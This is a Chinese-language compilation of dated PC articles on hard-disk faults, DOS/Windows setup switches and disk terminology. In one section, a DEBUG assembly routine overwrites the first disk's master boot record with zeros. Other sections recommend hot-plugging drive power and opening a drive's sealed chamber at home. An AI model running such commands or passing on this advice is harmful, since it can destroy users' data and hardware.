[color=Blue]一般来说，硬盘格式化后容量会小于标称值，但此差距绝不会超过20％，如果两者差距很大，则应该在开机时进入BIOS设置。在其中根据你的硬盘作合理设置。如果还不行，则说明可能是你的主板不支持大容量硬盘，此时可以尝试下载最新的主板BIOS并进行刷新来解决。此种故障多在大容量硬盘与较老的主板搭配时出现。另外，由于突然断电等原因使BIOS设置产生混乱也可能导致这种故障的发生。

常见故障六：无论使用什么设备都不能正常引导系统

    这种故障一般是由于硬盘被病毒的“逻辑锁”锁住造成的，“硬盘逻辑锁”是一种很常见的恶作剧手段。中了逻辑锁之后，无论使用什么设备都不能正常引导系统，甚至是软盘、光驱、挂双硬盘都一样没有任何作用。

    “逻辑锁”的上锁原理：计算机在引导DOS系统时将会搜索所有逻辑盘的顺序，当DOS被引导时，首先要去找主引导扇区的分区表信息，然后查找各扩展分区的逻辑盘。“逻辑锁”修改了正常的主引导分区记录，将扩展分区的第一个逻辑盘指向自己，使得DOS在启动时查找到第一个逻辑盘后，查找下个逻辑盘总是找到自己，这样一来就形成了死循环。

    给“逻辑锁”解锁比较容易的方法是“热拔插”硬盘电源。就是在当系统启动时，先不给被锁的硬盘加
电，启动完成后再给硬盘“热插”上电源线，这样系统就可以正常控制硬盘了。这是一种非常危险的方法，为了降低危险程度，碰到“逻辑锁”后，大家最好依照下面几种比较简单和安全的方法处理。
[/color]
[color=Brown][1. 首先准备一张启动盘，然后在其他正常的机器上使用二进制编辑工具（推荐UltraEdit）修改软盘上的IO.SYS文件（修改前记住先将该文件的属性改为正常），具体是在这个文件里面搜索第一个“55AA”字符串，找到以后修改为任何其他数值即可。用这张修改过的系统软盘你就可以顺利地带着被锁的硬盘启动了。不过这时由于该硬盘正常的分区表已经被破坏，你无法用“Fdisk”来删除和修改分区，这时你可以用Diskman等软件恢复或重建分区即可。

    2. 因为DM是不依赖于主板BIOS来识别硬盘的硬盘工具，就算在主板BIOS中将硬盘设为“NONE”，DM也可识别硬盘并进行分区和格式化等操作，所以我们也可以利用DM软件为硬盘解锁。

    首先将DM拷到一张系统盘上，接上被锁硬盘后开机，按“Del”键进入BIOS设置，将所有IDE接口设为
“NONE”并保存后退出，然后用软盘启动系统，系统即可“带锁”启动，因为此时系统根本就等于没有硬盘。启动后运行DM，你会发现DM可以识别出硬盘，选中该硬盘进行分区格式化就可以了。这种方法简单方便，但是有一个致命的缺点，就是硬盘上的数据保不住了
/color]

[color=Red]常见故障七：开机时硬盘无法自举，系统不认硬盘 [/color]
[color=Blue]这种故障往往是最令人感到可怕的。产生这种故障的主要原因是硬盘主引导扇区数据被破坏，表现为硬盘主引导标志或分区标志丢失。这种故障的罪魁祸首往往是病毒，它将错误的数据覆盖到了主引导扇区中。市面上一些常见的杀毒软件都提供了修复硬盘的功能，大家不妨一试。但若手边无此类工具盘，则可尝试将全0数据写入主引导扇区，然后重新分区和格式化，其方法如下：用一张干净的DOS启动盘启动计算机，进入A:\&gt;后输入以下命令（括号内为注释）：
    A:\&gt;DEBUG（进入DEBUG程序）
    －F 100 3FF0（将数据区的内容清为0）
    －A 400（增加下面的命令）
    MOV AX,0301
    MOV BX,0100
    MOV CX,0001
    MOV DX,0080
    INT 13
    INT 03
    －G=400（执行对磁盘进行操作的命令）
    －Q（退DEBUG程序）

    用这种方法一般能使你的硬盘复活，但由于要重新分区和格式化，里面的数据可就难保了。以上是硬盘在日常使用中的一些常见故障及解决方法，希望能对大家有所启发。如果硬盘的故障相当严重并不能用上述的一些方法处理时，则很可能是机械故障。由于硬盘的结构相当复杂，所以不建议用户自己拆卸，而应求助于专业人员予以维修。


硬盘彻底损坏后的数据抢救

《一键清理系统垃圾》

硬盘彻底损坏后的数据抢救

硬盘经常启动,是最常用的一个区域,所以损坏机率比其他扇区要大的多.我们来仔细谈谈硬盘0道的一些知识和维修方法

硬盘0道损坏的现象一般就是主板自检不通过(硬盘加点后自检声音正确的).还有的造成启动非常的慢(其他光盘引导也是慢).这种情况一般都能确定属于0道故障(还有一种和0道比较相近的故障就是硬盘固件错误通病,注意区分)

我们2中方法处理:
1:用户自己处理:可以用dm,lformat,mhdd来处理0道损坏硬盘(但成功率不高,只适合于轻微损坏的0道修复).我们推荐用lformat的热拔插法来修)
先用光盘引导电脑(代修硬盘先只插上数据线,不插电源线)等电脑启动成功后,然后这是在插硬盘的电源线(注意这是带电拔插,注意电源别插反了,搞不好烧板的)
等到硬盘起转自检声完成以后,运行lformat.exe软件,选择找到硬盘参数,进行低格.如果就是修0道故障,只需低格1分钟即可退出.用其他软件分区,看看修复成功没有.如果这样还不能修复,你可以试试hp,dm的擦除.mhdd的擦除试试.还不行就得低2中方法处理了

2:维修人员处理:一般专业的修理0道问题都是用pc3000来处理的比较多.你可以先扫描,伺服测试等,来确定是否就只是0道损坏,如果就是0道问题的话,手动封闭硬盘的0,0地址即可.自动屏蔽到p-list.
如果经过你的检测如果属于0磁头损坏的话,只有砍掉硬盘的0磁头才能正常的工作,具体方法不介绍(因为每个牌子的操作是不同的)

好了,以上就是关于0道一些知识.用户根据自己的情况来处理


硬盘彻底损坏后的数据抢救

《一键清理系统垃圾》

硬盘彻底损坏后的数据抢救

  Win 98 安装参数大揭密

SETUP提供了许多命令行参数，这些参数可分别实现许多不同的安装效果，在安装过程中可以利用这些命令行参数快速进行安装。SETUP的命令行参数如下：
    ／? 显示帮助信息
    ／C 安装过程中不使用磁盘高速缓存
    ／IC 指定在安装完成后的Windows 98中不包含现有Config.sys文件和Autoexec.bat文件中的任何内容
    ／ID 在安装过程中不检查剩余磁盘空间
    ／IE 在安装过程中不创建Windows 98启动盘
    ／IF 采用“快速”安装方式
    ／IH 在安装过程中跳过注册表数据库的检查
    ／IM 在安装过程中跳过对内存的检查
    ／IN 在安装过程中不启动Windows 98的网络安装向导
    ／IQ 跳过交*链接文件的检查
    ／IR 不更新主引导记录（Master Boot Record, MBR）
    ／IS 在安装前不进行磁盘扫描
    ／NOSTART 只拷贝Windows 98安装程序所必需的最小的动态链接库（DLL）文件，然后不予安装直接退出
    ／NF 文件拷贝工作完成后、重新启动计算机前不提醒用户抽出软驱中的软盘
    ／NH 在Windows 95条件下启动Windows 98安装程序时不运行Hwinfo.exe
    ／PJ 装入高级配置和电源管理接口（ACPI）程序
    ／SRCDIR 指定Windows 98安装文件目录
    ／S:filename 装入指定的Setup.inf文件进行安装
    ／T:tempdir 指定用于存放Windows 98临时文件的目录
    ／IW 在安装过程中不显示版权信息
    ／IX 在安装过程中不对字符集检测
    需要说明的是，上述所有命令行参数的应用范围都没有限制，也就是说我们既可在DOS下使用Windows 98安装程序的这些命令行参数，又可在Windows 95／97／98图形界面下使用这些命令行参数，广大用户可充分加以利用（如使用“setup ／id ／im ／in ／iq ／is”命令跳过有关检查即可减少许多安装时间）。
------------------------------------------------------------------
Win XP 安装参数大揭密

我们先来看看winnt32.exe有哪些参数可以使用。
    winnt32.exe位于i386目录里面。这个文件可以直接运行于windows下面，其具体参数有：
    注：安装或升级到 Windows XP。在运行 Windows 95、Windows 98、Windows Me、WindowsNT、Windows 2000 或 Windows XP 的计算机上，可以从命令提示符中运行 winnt32。
    语法：
    winnt32 [/checkupgradeonly] [/cmd:command_line] [/cmdcons][/copydir:i386folder_name] [/copysource:folder_name] [/debug[level]:[filename]] [/dudisable] [/duprepare:pathname][/dushare:pathname] [/m:folder_name] [/makelocalsource] [/noreboot] [/s:sourcepath][/syspart:drive_letter][/tempdrive:drive_letter] [/udf:id [,UDB_file]] [/unattend[num]:[answer_file]]
    参数：
    /checkupgradeonly
    检查计算机与 Windows XP 的升级兼容性。如果在使用该选项时使用了/unattend，则不需要用户输入。否则，结果将显示在屏幕上，并且可以用您指定的文件名保存它们。默认的文件名为 Upgrade.txt（位于systemroot 文件夹）。
    /cmd:command_line
    指示安装程序在执行最后阶段的安装前，运行一个特殊的命令。这将在计算机重新启动两次并且“安装程序”收集了必要的配置信息后，以及“安装程序”结束之前发生。
    /cmdcons
    在运行的计算机上将“故障恢复控制台”作为启动选项安装。恢复控制台是一个命令行界面，可以用它执行诸如启动和停止服务以及访问本地驱动器（包括 NTFS 格式的驱动器）这样的任务。只有在常规安装完毕后，才可以使用 /cmdcons 选项。
    /copydir:i386folder_name
    在安装 Windows XP 文件的文件夹内另外创建一个文件夹。文件夹名是指您为保存对站点所进行的修改而创建的文件夹。例如，您可以在安装程序的 i386 源文件夹中创建名为 Private_drivers 的文件夹，用来存放驱动程序文件。然后，您可以键入 /copydir:i386Private_drivers 让安装程序将该文件夹复制到新安装的计算机上，并建立新的文件夹位置 systemrootPrivate_drivers。还可以使用/copydir 命令创建任意多个其他的文件夹。
    /copysource:folder_name
    在安装 Windows XP 文件的文件夹内另外创建一个临时文件夹。文件夹名是指您为保存对站点所进行的修改而创建的文件夹。例如，您可以在安装程序的源文件夹中创建名为 Private_drivers 的文件夹，用来存放驱动程序文件。然后，您可以键入 /copysource:Private_drivers 以使安装程序将该文件夹复制到最新安装的计算机上，并在安装期间使用它的文件，从而建立临时文件夹位置systemrootPrivate_drivers。还可以使用 /copysource 命令创建任意多个其他的文件夹。与 /copydir 创建的文件夹不同，/copysource 创建的文件夹在安装完成后即被删除。
    /debug[level]:[filename]在指定等级处创建调试日志，例如，/debug4:Debug.log。默认日志文件为:systemrootWinnt32.log，并且默认调试等级为 2。日志等级如下所示：0 -- 严重错误、1 -- 错误、2 -- 警告、3 -- 通知、4 -- 用于调试的详细信息。每个级别都在其下包括一些子级别。
    /dudisable
    禁用“动态更新”。没有“动态更新”，安装程序仅能在初始安装文件下运行。即使使用应答文件并在该文件中指定“动态更新”选项，该选项仍会禁用“动态更新”。
    /dushare:pathname
    将以前从 Windows Update 网站下载的“动态更新”文件（更新的文件在安装时使用）的目录指定为共享。当从安装共享处运行并使用 /duprepare 时，该选项将执行准备操作，这样，经过更新的文件才能在基于网络的客户端安装中使用。如果没有使用/duprepare 并且在客户端上运行，则指定客户端安装将使用位于 pathname 所指定的共享位置的更新文件。
    /duprepare
    进行安装共享准备，使从 Windows Update 网站下载的“动态更新”文件可以使用它。然后，该共享可用于多个客户端的 Windows XP 安装。只能与 /dushare 一起使用。
    /m:folder_name
    指定“安装程序”从备用位置复制替换文件。指导“安装程序”首先在备用位置中查看，如果有文件显示，则应使用这些文件而非默认位置中的文件。
    /makelocalsource
    指示安装程序将所有的安装源文件复制到本地硬盘上。当采用从光盘安装时，使用/makelocalsource 可以在以后没有光盘的情况下，为计算机提供安装文件。
    /noreboot
    指导“安装程序”在结束文件复制阶段之后不重新启动计算机，这样您就可以执行另一个命令。
    /s:sourcepath
    指定 Windows XP 文件的源位置。要同时从多个服务器复制文件，请多次键入
    /s:sourcepath 选项（最多八次）。如果输入多次选项，则所指定的第一个服务器必须是可用的，否则“安装程序”失败。
    /syspart:drive_letter
    表明可以将安装启动文件复制到一个硬盘上，并将硬盘标记为活动，然后将该磁盘安装到其他计算机上。启动该计算机时，它将自动启动下一阶段的安装。但必须始终同时使用 /tempdrive 参数和 /syspart 参数。在运行 Windows NT 4.0、Windows 2000 或 Windows XP 的计算机上，可以使用/syspart 选项来启动 Winnt32。运行 Windows 95、Windows 98 或 Windows Me 的计算机不能使用该选项。
    /tempdrive:drive_letter
    指导安装程序将临时文件放置到指定部分。对于全新安装， 可以将 Windows XP 安装在指定的分区。对于升级安装，/tempdrive 选项仅影响临时文件的位置，而操作系统的升级则在运行 winnt32 的分区中进行。
    /udf:id [,UDB_file]
    指出安装程序用来指定“唯一数据库”(UDB) 文件如何修改应答文件的标识符 (id)（请参阅 /unattend 项）。UDF 会覆盖应答文件中的一些值，且标识符会决定使用 UDF 中的哪些值。例如，/udf:RAS_user,Our_company.udb 会覆盖Our_company.udb 文件中为 RAS_user 标识符指定的一些设置。如果没有指定 UDF_file，安装程序会提示用户插入一张含有Unique.udb 文件的磁盘。
    /unattend
    以无人参与的安装模式升级 Windows 98 或 Windows Me 以前的版本。因为所有用户设置都可以从上一次安装中获得，所以在安装过程中并不需要用户干预。
    /unattend[num]:[answer_file]
    在无人参与安装模式下执行干净安装。所指定的应答文件为安装程序提供了您自定义的设置信息。Num 是在安装程序结束复制这些文件与重新启动计算机之间间隔的秒数。在运行Windows 98、Windows Me、Windows NT、Windows 2000 或 Windows XP 的任何计算机上都可以使用 num 选项。如果使用 /unattend 命令行选项来自动完成安装程序，则表示您已经阅读和接受了Windows XP 的 Microsoft 许可协议。在代表某个组织而不是您自己使用该命令行选项来安装 Windows XP 之前，您必须确认最终用户（无论是个人还是单个实体）已经接收、阅读并接受 Windows XP 的 Microsoft 许可协议的条款。OEM 在销售给最终用户的机器上可能不会指定此值。
有零工作室　www.you0.com www.you0.net联系QQ 3149886


硬盘出现硬件故障，你敢这样维修么？

《一键清理系统垃圾》

硬盘出现硬件故障，你敢这样维修么？

前些日子从同学处取得一块昆腾1.2G的小硬盘,有一奇异的毛病---开机自检时若能发现硬盘则用起来基本没有问题,但有时候自检并不能发现硬盘,表现为硬盘启动后高速旋转然后在某个地方停了下来,接着就是“卡塔卡塔”的声音，然后屏幕显示硬盘出错，停在那里。同学有一经验，每次遇到这种情况，曰只需在关机后拔下硬盘的盘体到电路板的连线，然后再开机，听到硬盘启动后再关机，这时再插上连线，只要听到“当”的一声就OK了！

随着这硬盘在我手里的日子增长，同学的那一招也越发不起作用了。到了后来干脆是无论怎样也不动了，只听见“卡塔卡塔”的声音不绝于耳。想起《电脑报》上的种种方法均取之一试，未见有效。不得已而为之，拿出螺丝刀。各位千万注意：不到万不得已别用这招！

硬盘的壳体上有六颗螺丝，主轴有一颗，磁头部分有一颗，一共八颗螺丝，下了就可以小心翼翼的打开硬盘了！虽然我们DIYER的家里并没有超静的空间，可是经过我的试验在比较干净的卧室完成这一任务不会给硬盘造成什么伤害！打开硬盘的腔体后，可以看见亮晶晶的盘片，还有一对磁头悬停在盘片的两面。将磁头轻轻的掀起，用镜头纸小心地擦拭。注意：磁头十分脆弱！稍有不慎，即前功尽弃！往上掀起磁头时不能离盘片太高，擦拭磁头也应该从里到外沿盘片的轴向。其实并不太难，也就是十分钟的功夫，估计磁头擦干净了便可以了。这时你会发现盘片上有一些小小的霉点，也一同擦掉，再用FORMAT请别加任何参数，这样FORMAT会找出所有坏道并一一纪录在案（此步操作为必须）。以后操作系统不会去访问有坏道的扇区。这样，一个想轻生的硬盘又被我从死神那里拉了回来。呵呵！虽然是很惊险的，但如果你也有那样的硬盘的话---干脆破罐子乱甩，哈哈，说不定会有惊喜哟！

编辑评注：这种方法的确比较惊险，稍不小心，硬盘将毁于一旦。所以在这里要提醒大家的是：在动手的时候，遵循胆大心细的原则是最重要的，如果不到万不得已，千万不要如此维修硬盘。


硬盘的常见错误提示及解决方法

《一键清理系统垃圾》

硬盘的常见错误提示及解决方法

一、显示：“C：Drive Failure Run Setup Utility，Press（F1）To Resume”

    此类故障是硬盘参数设置不正确所以从软盘引导硬盘可用，只要重新设置 硬盘参数即可。

二、显示：“No ROM Basic，System Halted”

病因分析：造成该故障的原因一般是引导程序损坏或被病毒感染，或是分区表中无自举标志，或是结束标志55AAH被改写。

治疗方法：从软盘启动，执行命令“FDISK/MBR"即可。FDISK中包含有主引导程序代码和结束标志55AAH，用上述命令可使FDISK中正确的主引导程序和结束标志覆盖硬盘上的主引导程序，这一招对于修复主引导程序和结束标志55AAH损坏既快又灵。对于分区表中无自举标志的故障，可用NDD迅速恢复。

三、显示“Error loading operating system”或“Missing operating system”

病因分析：造成该故障的原因一般是DOS引导记录出现错误。DOS引导记录位于逻辑0扇区，是由高级格式化命令FORMAT生成的。主引导程序在检查分区表正确之后，根据分区表中指出的DOS分区的起始地址，读DOS引导记录，若连续读五次都失败，则给出“Error loading opearting system”的错误提示，若能正确读出DOS引导记录，主引导程序则会将DOS引导记录送入内存0:7C00h处，然后检查DOS引导记录的最后两个字节是否为55AAH，若不是这两个字节，则给出“Missing operation system”的提示。

治疗方法：一般情况下用NDD修复即可。若不成功，只好用FORMAT C:/S命令重写DOS引导记录，也许你会认为格式化后C盘数据将丢失，其实不必担心，数据仍然保存在硬盘上，格式化C盘后可用NU8.0中的UNFORMAT恢复。如果曾经用DOS命令中的MIRROR或NU8.0中的IMAGE程序给硬盘建立过IMAGE镜像文件，硬盘可完全恢复，否则硬盘根目录下的文件全部丢失，根目录下的第一级子目录名被更名为DIR0、DIR1、 DIR2......，但一级子目录下的文件及其下级子目录完好无损，至于根目录下丢失的文件，你可用NU8.0中的UNERASE再去恢复即可。

四、显示：“Invalid Drive Specification”

治疗方法：

1、重新分区格式化

2、如0磁道损坏需要低级格式化，然后用Set Comspec（指定Command文件位置），使得Command远离0磁道。

    当硬盘出现分区故障后，希望用户先用上述方法解决，若不成功，对硬盘分区格式化是解决软故障的基本方法，但信息将被清除。其使用原则是：能用高格解决的不用分区，能用分区解决的不用低级格式化。

五、显示：“Device error”，然后又显示：“Non－System disk or disk error，Replace and strike any key when ready”，说明硬盘不能启动，用软盘启动后，在A：>后键入C：，屏幕显示：“Invalid drive specification"，系统不认硬盘。

病因分析：造成该故障的原因一般是CMOS中的硬盘设置参数丢失或硬盘类型设置错误造成的。

治疗方法：进入CMOS，检查硬盘设置参数是否丢失或硬盘类型设置是否错误，如果确是该种故障，只需将硬盘设置参数恢复或修改过来即可，如果忘了硬盘参数不会修改，也可用备份过的CMOS信息进行恢复，如果你没有备份CMOS信息，也别急，有些高档微机的CMOS设置中有“HDD Auto Detection”(硬盘自动检测)选项，可自动检测出硬盘类型参数。若无此项，只好打开机箱，查看硬盘表面标签上的硬盘参数，照此修改即可。

六、显示：“HDD Controller Failure”

病因分析：造成该故障的原因一般是硬盘线接口接触不良或接线错误。

治疗方法：先检查硬盘电源线与硬盘的连接，再检查硬盘数据信号线与多功能卡或硬盘的连接，如果连接松动或连线接反都会有上述提示，最好是能找一台型号相同且使用正常的微机，可以对比线缆的连接，若线缆接反则一目了然。

七、显示：“Invalid partition table”，硬盘不能启动，若从软盘启动则认C盘。

病因分析：造成该故障的原因一般是硬盘主引导记录中的分区表有错误，当指定了多个自举分区(只能有一个自举分区)或病毒占用了分区表时，将有上述提示。主引导记录(MBR)位于0磁头/0柱面/1扇区，由FDISK.EXE对硬盘分区时生成。MBR包括主引导程序、分区表和结束标志55AAH三部分，共占一个扇区。主引导程序中含有检查硬盘分区表的程序代码和出错信息、出错处理等内容。当硬盘启动时，主引导程序将检查分区表中的自举标志。若某个分区为可自举分区，则有分区标志80H，否则为00H，系统规定只能有一个分区为自举分区，若分区表中含有多个自举标志时，主引导程序会给出“Invalid partion table"的错误提示。

治疗方法：最简单的解决方法是用NDD修复，它将检查分区表中的错误，若发现错误，将会询问你是否愿意修改，你只要不断地回答YES即可修正错误，或者用备份过的分区表覆盖它也行(KV300，NU8.0中的RESCUE都具有备份与恢复分区表的功能)。如果是病毒感染了分区表，格式化是解决不了问题的，可先用杀毒软件杀毒，再用NDD进行修复。如果上述方法都不能解决，还有一招，就是先用FDISK重新分区，但分区大小必须和原来的分区一样，这一点尤为重要，分区后不要进行高级格式化，然后用NDD进行修复。修复后的硬盘不但能启动，而且硬盘上的信息也不会丢失。其实用Fdisk分区，相当于用正确的分区表覆盖原来的分区表。尤其当用软盘启动后不认硬盘时，这一招特灵。


硬盘的技术术语（二）

《一键清理系统垃圾》

硬盘的技术术语（二）

    8. 自动检测分析及报告技术（Self-Monitoring Analysis and Report Technology，简称S.M.A.R.T）:

    目前硬盘的平均无故障运行时间(MTBF)已达50000小时以上，但这对于挑剔的专业用户来说还是不够的，因为他们储存在硬盘中的数据才是最有价值的，因此专业用户所需要的就是能提前对故障进行预测的功能。正是这种需求才使S.M.A.R.T.技术得以应运而生。

    现在出厂的硬盘基本上都支持S.M.A.R.T技术。这种技术可以对硬盘的磁头单元、盘片电机驱动系统、硬盘内部电路以及盘片表面媒介材料等进行监测，它由硬盘的监测电路和主机上的监测软件对被监测对象的运行情况与历史记录及预设的安全值进行分析、比较，当S.M.A.R.T监测并分析出硬盘可能出现问题时会及时向用户报警以避免电脑数据受到损失。S.M.A.R.T技术必须在主板支持的前提下才能发生作用，而且同时也应该看到S.M.A.R.T.技术并不是万能的，对渐发性的故障的监测是它的用武之地，而对于一些突发性的故障，如对盘片的突然冲击等，S.M.A.R.T.技术也同样是无能为力的。

    9.磁阻磁头技术MR(Magneto－Resistive Head)：

    MR(MagnetoResistive)磁头，即磁阻磁头技术。MR技术可以更高的实际记录密度、记录数据，从而增加硬盘容量，提高数据吞吐率。目前的MR技术已有几代产品。MAXTOR的钻石三代/四代等均采用了最新的MR技术。磁阻磁头的工作原理是基于磁阻效应来工作的，其核心是一小片金属材料,其电阻随磁场变化而变化,虽然其变化率不足2%,但因为磁阻元件连着一个非常灵敏的放大器,所以可测出该微小的电阻变化。MR技术可使硬盘容量提高40%以上。GMR（GiantMagnetoresistive）巨磁阻磁头GMR磁头与MR磁头一样，是利用特殊材料的电阻值随磁场变化的原理来读取盘片上的数据，但是GMR磁头使用了磁阻效应更好的材料和多层薄膜结构，比MR磁头更为敏感，相同的磁场变化能引起更大的电阻值变化，从而可以实现更高的存储密度，现有的MR磁头能够达到的盘片密度为3Gbit－5Gbit/in2（千兆位每平方英寸），而GMR磁头可以达到10Gbit－40Gbit/in2以上。目前GMR磁头已经处于成熟推广期，在今后的数年中，它将会逐步取代MR磁头，成为最流行的磁头技术。当然单碟容量的提高并不是单靠磁头就能解决的，这还要有相应盘片材料的改进才行，比如IBM早在去年率先在75GXP硬盘中采用玻璃介质的盘片。

    10.缓存：

    全称是数据缓冲存储器(cache buffer)指的是硬盘的高速缓冲存储器，是硬盘与外部总线交换数据的场所。硬盘的读数据的过程是将磁信号转化为电信号后，通过缓存一次次地填充与清空，再填充，再清空，一步步按照PCI总线的周期送出，可见，缓存的作用是相当重要的。在接口技术已经发展到一个相对成熟的阶段的时候，缓存的大小与速度是直接关系到硬盘的传输速度的重要因素。它一般使用7～10ns的SDRAM，目前主流IDE硬盘的数据缓存是2MB，但西部数据得JB系列的缓存达到了8MB，性能非常优秀。

    11.连续无故障时间（MTBF）：

    指硬盘从开始运行到出现故障的最长时间，单位为小时。一般硬盘的MTBF都在30000或50000小时之间，算下来如果一个硬盘每天工作10小时，一年工作365天，它的寿命至少也有8年，所以用户大可不必为硬盘的寿命而担心。不过出于对数据安全方面的考虑，最好将硬盘的使用寿命控制在5年以内。

    12.部分响应完全匹配技术(PRML)：

    它能使盘片存储更多的信息，同时可以有效地提高数据的读取和数据传输率。是当前应用于硬盘数据读取通道中的先进技术之一。PRML技术是将硬盘数据读取电路分成两段"操作流水线"，流水线第一段将磁头读取的信号进行数字化处理然后只选取部分"标准"信号移交第二段继续处理，第二段将所接收的信号与PRML芯片预置信号模型进行对比，然后选取差异最小的信号进行组合后输出以完成数据的读取过程。PRML技术可以降低硬盘读取数据的错误率，因此可以进一步提高磁盘数据密集度。

    13.单磁道时间（Single track seek time）：

    指磁头从一磁道转移至另一磁道所用的时间。

    14.超级数字信号处理器(Ultra DSP)技术：

    应用Ultra DSP进行数学运算，其速度较一般CPU快10到50倍。采用Ultra DSP技术，单个的DSP芯片可以同时提供处理器及驱动接口的双重功能，以减少其它电子元件的使用，可大幅度地提高硬盘的速度和可靠性。接口技术可以极大地提高硬盘的最大外部传输率，最大的益处在于可以把数据从硬盘直接传输到主内存而不占用更多的CPU资源，提高系统性能。

    15.硬盘表面温度：

    指硬盘工作时产生的温度使硬盘密封壳温度上升情况。硬盘工作时产生的温度过高将影响薄膜式磁头(包括MR磁头)的数据读取灵敏度，因此硬盘工作表面温度较低的硬盘有更好的数据读、写稳定性。

    16.全程访问时间（Max full seek time）：

    指磁头开始移动直到最后找到所需要的数据块所用的全部时间。


硬盘的技术术语（一）

《一键清理系统垃圾》

硬盘的技术术语（一）

    1. 单碟容量(storage per disk)：

    这也是划分硬盘档次的一个指标，由于硬盘都是由一个或几个盘片组成的，所以单碟容量就是指包括正反两面在内的每个盘片的总容量。单碟容量的提高意味着生产厂商研发技术的提高，这所带来的好处不仅是使硬盘容量得以增加，而且还会带来硬盘性能的相应提升。因为单碟容量的提高就是盘片磁道密度每英寸的磁道数）的提高，磁道密度的提高不但意味着提高了盘片的磁道数量，而且在磁道上的扇区数量也得到了提高，所以盘片转动一周，就会有更多的扇区经过磁头而被读出来，这也是相同转速的硬盘单碟容量越大内部数据传输率就越快的一个重要原因。此外单碟容量的提高使线性密度(每英寸磁道上的位数)也得以提高，有利于硬盘寻道时间的缩短。

    2．硬盘的转速(Rotationl Speed)：

    也就是硬盘电机主轴的转速。主轴转速(rotational speed或spindle speed)，这是划分硬盘档次的一个重要指标。以每分钟硬盘盘片的旋转圈数来表示，单位rpm，目前常见的硬盘转速有5400rpm、7200rpm和10000rpm等。理论上转速越高，硬盘性能相对就越好，因为较高的转速能缩短硬盘的平均等待时间并提高硬盘的内部传输速度。但是转速越快的硬盘发热量和噪音相对也越大。为了解决这一系列的负面影响，应用在精密机械工业上的液态轴承马达（Fluid dynamic bearing motors）便被引入到硬盘技术中。液态轴承马达使用的是黏膜液油轴承，以油膜代替滚珠。这样可以避免金属面的直接磨擦，将噪声及温度被减至最低；同时油膜可有效吸收震动，使抗震能力得到提高；此外这还能减少磨损，提高硬盘寿命。

    3.平均寻道时间（Average seek time）：

    指硬盘在盘面上移动读写头至指定磁道寻找相应目标数据所用的时间，它描述硬盘读取数据的能力，单位毫秒(ms)。当单碟片容量增大时，磁头的寻道动作和移动距离减少，从而使平均寻道时间减少，加快硬盘速度。目前市场上主流硬盘的平均寻道时间一般在9ms左右，但现在市面上新火球一代，以及美钻2代，平均寻道时间在12ms左右，都是5400转的产品，大家购买时要考虑到这一点。

    4.平均潜伏时间（Average latency　time）：

     指当磁头移动到数据所在的磁道后，等待指定的数据扇区转动到磁头下方的时间，单位为毫秒(ms)。平均潜伏期时间是越小越好，潜伏期短代表硬盘在读取数据时的等待时间更短，转速越快的硬盘具有更低的平均潜伏期，而与单碟容量关系不大。一般来说，5400rpm硬盘的平均潜伏期为5.6ms，而7200rpm硬盘的平均潜伏期为4.2ms。

    5.平均访问时间（Average access time）：

    指磁头从起始位置到达目标磁道位置，并且从目标磁道上找到指定的数据扇区所需的时间，单位为毫秒(ms)。平均访问时间最能够代表硬盘找到某一数据所用的时间，越短的平均访问时间越好，一般在11ms－18ms之间。。平均访问时间体现了硬盘的读写速度，它包括了硬盘的平均寻道时间和平均潜伏期，即：平均访问时间=平均寻道时间+平均潜伏期。

    注意：现在不少硬盘广告之中所说的平均访问时间大部分都是用平均寻道时间所代替的。
    6．道-道间寻道时间(single track seek)，指磁头从一磁道移动至另一磁道的时间，单位为毫秒(ms)。

    7. 数据传输率(Data Transfer Rate) 计算机通过IDE接口从硬盘的缓存中将数据读出交给相应的控制器的速度与硬盘将数据从盘片上读取出交给硬盘上的缓冲存储器的速度相比，前者要比后者快得多，前者是外部数据传输率(External Transfer Rate)，而后者是内部数据传输率(Internal Transfer Rate)，两者之间用一块缓冲存储器作为桥梁来缓解速度的差距。通常也把外部数据传输率称为突发数据传输率(Burst data Transfer Rate)，指的是电脑通过数据总线从硬盘内部缓存区中所读取数据的最高速率突发数据传输率（Burst data transfer rate）。以目前IDE硬盘的发展现状来看，理论上采用ATA-100传输协议的硬盘外部传输率已经达到100MB/s，然而最新的采用ATA-133的传输率以后，传输率又可达133MB/s。

    内部数据传输率也被称作硬盘的持续传输率(Sustained Transfer Rate)，指磁头至硬盘缓存间的数据传输率，一般取决于硬盘的盘片转速和盘片数据线密度（指同一磁道上的数据间隔度）。也叫持续数据传输率（sustained transfer rate）。

    由于内部数据传输率才是系统真正的瓶颈，因此大家在购买时要分清这两个概念。不过一般来讲，硬盘的转速相同时，单碟容量大的内部传输率高；在单碟容量相同时，转速高的硬盘的内部传输率高。一般取决于硬盘的转速和盘片线性密度。应该清楚的是只有内部传输率向外部传输率接近靠拢，有效地提高硬盘的内部传输率才能对磁盘子系统的性能有最直接、最明显的提升。目前各硬盘生产厂家努力提高硬盘的内部传输率，除了改进信号处理技术、提高转速以外，最主要的就是不断的提高单碟容量以提高线性密度。由于单碟容量越大的硬盘线性密度越高，磁头的寻道频率与移动距离可以相应的减少，从而减少了平均寻道时间，内部传输速率也就提高了。


硬盘灯长亮不息

《一键清理系统垃圾》

硬盘灯长亮不息

    （广西 周伟勋）答：此问题可以从三方面来考虑。一、硬盘灯的插脚连接不正确，请正确安装或改变一下插脚的极性（即反向插）。二、控制硬盘指示灯的开关三极管被击穿，需要进行更换。三、当硬盘与光驱使用同一条数据线时，如果光驱内有光盘且需要预读的话，系统就会认为有IDE设备在工作，硬盘指示灯就会长亮。解决方法是关闭光驱的预读功能或让光驱单独使用一条数据线。


硬盘分区常见问题解决二则

《一键清理系统垃圾》

硬盘分区常见问题解决二则

《中国电脑教育报》张新奎

    硬盘分区是每一个计算机爱好者都非常熟悉的基本技能，大家对fdisk更是“了如指掌”，其实不然，fdisk命令还有好多功能我们还不知道，还有一些隐藏参数不为人知，以下就利用fdisk命令的隐藏参数解决两个常见的硬盘分区中的问题。

    问题一：硬盘分区时，既要有FAT16格式又要有FAT32格式，或者硬盘只认FAT16格式，从而不能安装WIindows 98操作系统等等。

    解决方法：通常状况下，大家是通过各种分区软件进行格式转换，以求满足用户的需要。这种方法操作复杂，而且分区软件并不是随处都有，非常不方便。在这里，我们在拥有一张启动盘的前提下给大家介绍一种极其简单的办法，既方便又实用，那就是利用fdisk的一个实用参数/fprmt，此参数的功能是在交互模式下询问FAT16格式和FAT32格式的使用。当用户输入fdisk /fprmt命令回车后，硬盘分区时不会出现是否支持大容量硬盘的询问画面，而是在每次建立一个分区时询问使用FAT16格式还是FAT32格式。非常方便吧。

